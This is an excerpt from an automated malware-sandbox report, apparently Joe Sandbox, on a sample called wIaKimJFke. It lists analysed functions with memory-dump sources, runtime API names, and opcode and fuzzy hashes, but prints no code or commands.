                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                              • Instruction ID: 6b8efacbb62cd16067919a2e9370fe40097c4149ac5cc95b0e2a4ccf0696623c
                                                                                              • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                              • Instruction Fuzzy Hash: AE51193060C64D6AFB38992C889DBFE6FB9FB4D300F140859D482D76C2D6159EC9C356
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00526809 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4d6996d350552408bf5788cafbdc0bd499943ba70294284caa308a20fb981425
                                                                                              • Instruction ID: 39c2a5267dc6f639d19f8e5f7656add62750e3e21370a5ef0c81057797c57f60
                                                                                              • Opcode Fuzzy Hash: 4d6996d350552408bf5788cafbdc0bd499943ba70294284caa308a20fb981425
                                                                                              • Instruction Fuzzy Hash: 46B13631610619CFDB19CF28D486B657FA0FF46364F298658E89ACF2E1C735E992CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004FCD47 Relevance: .2, Instructions: 172COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 004E239E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ___std_exception_copy
                                                                                              • String ID:
                                                                                              • API String ID: 2659868963-0
                                                                                              • Opcode ID: 4cf3e17f15f55cc9f46cc3af81423a8ab85daee3eb60ad6ee615e62e4231bb07
                                                                                              • Instruction ID: d55c053c776d2d64ea923e8a1bd323b4c08152e5330553a25f3117255d804926
                                                                                              • Opcode Fuzzy Hash: 4cf3e17f15f55cc9f46cc3af81423a8ab85daee3eb60ad6ee615e62e4231bb07
                                                                                              • Instruction Fuzzy Hash: F051DEB5D006098BEB18DF54D8857AFBBF1FB08354F24812AD519EB390D378A984DF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0052707B Relevance: .1, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1c4eb396f23f10b4ada064c703f9a99f54ee3a50c5d23f23acbe0f8a560b2ec2
                                                                                              • Instruction ID: eb01c0e6ff06cf59b2d36c48a57c0817fb138bf30ff7880e23a2b361600fe775
                                                                                              • Opcode Fuzzy Hash: 1c4eb396f23f10b4ada064c703f9a99f54ee3a50c5d23f23acbe0f8a560b2ec2
                                                                                              • Instruction Fuzzy Hash: 6321D673F2043907770CC47E8C532BDB6E1C68C500745823AE8A6EA2C1D968D917E2E4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00526F5B Relevance: .1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1f9344e6d8cd3a50110376d5bb5c1c1c7745f22d30755496d4e9507d2eb2c7b2
                                                                                              • Instruction ID: 908fb84a22dc1c3c5ff29a61ce899a6720a3c852794edc6b74650281f25d074d
                                                                                              • Opcode Fuzzy Hash: 1f9344e6d8cd3a50110376d5bb5c1c1c7745f22d30755496d4e9507d2eb2c7b2
                                                                                              • Instruction Fuzzy Hash: 86117373F30C255A675C816D8C172BAA5D2EBD825071F533AD826E73C4E9A4DE23D290
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00527EB0 Relevance: .1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction ID: 65731424fde59228a47fbeca1bfc4294daf0c75ff04a73607ae8bcbcfe55e408
                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction Fuzzy Hash: 0F110B7720C07A43D615C63DFAB45B79F95FFCF320B2D42A9D1514BBD8D122A9459900
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04ED0CC7 Relevance: .0, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1670194124.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4ed0000_wIaKimJFke.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 991ad2238ed57cf0b475cccc97c12f2d5d0d91e76879a31dce8f7d9179ed300d
                                                                                              • Instruction ID: 73d7572cf5f5f370c7fe7e8aedb5604107a9688192810098467212f82f5f8e2b
                                                                                              • Opcode Fuzzy Hash: 991ad2238ed57cf0b475cccc97c12f2d5d0d91e76879a31dce8f7d9179ed300d
                                                                                              • Instruction Fuzzy Hash: 74E02BBB60E9005EB528C861BE56FFF3B68F7C0334735996BD483D4801E242559781B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00519B02 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                              • Instruction ID: ebd58515b7e8823d5154b225836ddde24a17f5c1a1202e966c2922a67b7015ad
                                                                                              • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                              • Instruction Fuzzy Hash: 5FE08C32929238EBDB15DB98D94898AFBECFB89B00B150496F501D3140C270EE40C7D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00516AC6 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _wcsrchr
                                                                                              • String ID: .bat$.cmd$.com$.exe
                                                                                              • API String ID: 1752292252-4019086052
                                                                                              • Opcode ID: ef1c598a0457f4fe99fbdd4e102e5f68daf135567377f9fde5096bcbfabcbf0d
                                                                                              • Instruction ID: 2dd09a533b4a5ff8ada615872d5c1ddb6946d9015bfa65451c9d1c1adfa42299
                                                                                              • Opcode Fuzzy Hash: ef1c598a0457f4fe99fbdd4e102e5f68daf135567377f9fde5096bcbfabcbf0d
                                                                                              • Instruction Fuzzy Hash: ED01A53BA1862626361420299C02BFB1F98BBC2BB0B15012EFD54F71C1EF56DCC251A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E2DA0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Mtx_unlock$Cnd_broadcast
                                                                                              • String ID:
                                                                                              • API String ID: 32384418-0
                                                                                              • Opcode ID: 06145f30b03bd4b16a6b4aa4fe1a141d36d43a2d807628b4d219d20723c6f842
                                                                                              • Instruction ID: 3177a36a3cf188ad4170919166d7e588358f4d01e45a3a0fc1f23bce13d89b6b
                                                                                              • Opcode Fuzzy Hash: 06145f30b03bd4b16a6b4aa4fe1a141d36d43a2d807628b4d219d20723c6f842
                                                                                              • Instruction Fuzzy Hash: FEA102B09002599FDB11DF66CA44B6BB7A8FF1531AF00412EE915D7341EB78EA04CBD5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004E2590 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 004E2726
                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 004E27C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668250799.00000000007F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668517959.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668534626.0000000000990000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668550436.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1668564958.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4e0000_wIaKimJFke.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ___std_exception_copy___std_exception_destroy
                                                                                              • String ID: p"N$p"N
                                                                                              • API String ID: 2970364248-2446604238
                                                                                              • Opcode ID: e8b93c47192eeecc7d3f772e42aef4ebff7a346d2f94fedd474b90aafe45497c
                                                                                              • Instruction ID: 76aa224b098bcd90c4046a7c53663e9bf6b9f10543f9340ad6c7697f2f4ded67
                                                                                              • Opcode Fuzzy Hash: e8b93c47192eeecc7d3f772e42aef4ebff7a346d2f94fedd474b90aafe45497c
                                                                                              • Instruction Fuzzy Hash: 6B71A271E002489BDB04DFA8D981BEDFBB5FF49310F14422EE805A7381D774A984CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004F7360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 004F744C
                                                                                              • __Cnd_destroy_in_situ.LIBCPMT ref: 004F7458
                                                                                              • __Mtx_destroy_in_situ.LIBCPMT ref: 004F7461
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1667875767.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667895886.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667951731.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.0000000000548000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
